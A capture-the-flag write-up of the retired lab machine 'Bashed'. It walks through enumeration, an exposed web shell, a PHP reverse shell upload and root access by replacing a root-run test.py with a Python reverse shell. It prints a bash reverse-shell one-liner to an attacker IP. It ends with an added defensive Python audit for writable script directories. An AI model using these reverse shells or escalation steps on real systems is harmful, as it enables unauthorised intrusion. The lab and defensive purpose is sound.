Bashed is a vulnerable Linux machine from the retired machines list. By exploiting its vulnerabilities, we are expected to obtain the user and root flags.
We perform a network scan to identify the services on the target machine.
Classic scan

Full port scan

The port scan showed that only port 80/tcp is open, with an HTTP service running on it.
Because of the HTTP service, we continue enumerating the target through the browser.



We enumerated the website and did not find any useful information, so we ran directory scans with gobuster and dirbuster.


The directory scan found /css, /dev, /fonts, /images, /index.html, /js, /php, /server-status and /uploads.
We looked in all of them, and the /dev directory was the most interesting.



These pages gave us a shell as we know it.
We were able to run the commands we wanted.

Let’s run a bash reverse shell, since we can run the commands we want:
bash -i >& /dev/tcp/10.10.14.13/1234 0>&1
Before running the command, we start an ncat listener to catch the shell.

We didn’t get a shell ☹
Let’s try uploading a shell through the uploads directory instead.


We went into the uploads folder and created a file named muhammed.

As we can see, if we enter the name of a file that is not here, we get an error. Let’s try to upload pentestmonkey’s PHP reverse shell here.

We uploaded our shell to the machine.
Now let’s run our shell.


Ta ta ta ta, we got our shell.

Since our shell is unprivileged, let’s check what we are allowed to run with sudo -l.
When we ran sudo -l, we saw that we can run any command as the scriptmanager user.

By typing the command “sudo -u scriptmanager bash” we switched to that user, and then we found and noted our user flag.

When we try to access the root flag, we get a permission error.

We tried to escalate privileges with sudo -l again, but it asked for a password, and since we did not have one we could not proceed.
We perform local enumeration.

The scripts directory attracts our attention. Inside it, the test.py and test.txt files stand out.

Here, test.py writes to test.txt when it runs.

We delete the test.py file and create a new test.py that will give us a reverse shell.

On our machine, we create a Python file called test.py that will open a reverse shell.
We take the Python reverse shell from pentestmonkey, edit it and save it.


Now we start a web service in Python to transfer the file, and download the file on the target.
Our attacker machine

Target machine

We placed our reverse shell on the target machine and waited 1 minute.
Then we received the reverse shell on the listener we had opened in the background.

And we were able to get the root flag.
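
The root step above worked because a privileged job ran test.py from a directory that a non-root user could modify. The following audit is an added example, not part of the original write-up: it flags that condition so it can be fixed. The function name audit_script_dir and the sample layout are assumptions made for illustration.

```python
import os
import stat
import sys
import tempfile


def audit_script_dir(path, trusted_uid=0):
    """Return (entry, reason) pairs showing how a non-trusted user could
    change what a privileged job executes from this directory."""
    findings = []
    # The directory itself comes first: write access to it is enough to delete
    # and recreate a script, even when the script file is owned by root.
    entries = [path] + [os.path.join(path, n) for n in sorted(os.listdir(path))]
    for entry in entries:
        st = os.lstat(entry)  # lstat inspects a symlink itself, not its target
        if stat.S_ISLNK(st.st_mode):
            findings.append((entry, "symlink: target is not checked here"))
            continue
        if st.st_uid != trusted_uid:
            findings.append((entry, "owned by uid %d, expected %d"
                             % (st.st_uid, trusted_uid)))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((entry, "group- or world-writable"))
    return findings


if __name__ == "__main__":
    demo = len(sys.argv) < 2
    if demo:
        # Constructed sample: a 0644 script inside a world-writable directory.
        target = tempfile.mkdtemp()
        script = os.path.join(target, "test.py")
        open(script, "w").close()
        os.chmod(script, 0o644)
        os.chmod(target, 0o777)
        uid = os.getuid()  # treat the current user as trusted in the demo
    else:
        target, uid = sys.argv[1], 0  # real audit: only root is trusted
    results = audit_script_dir(target, trusted_uid=uid)
    for entry, reason in results:
        print("%s: %s" % (entry, reason))
    sys.exit(1 if results else 0)
```

Run it against the directory the scheduled job reads; a clean result means both the directory and every script in it are root-owned and not writable by group or others.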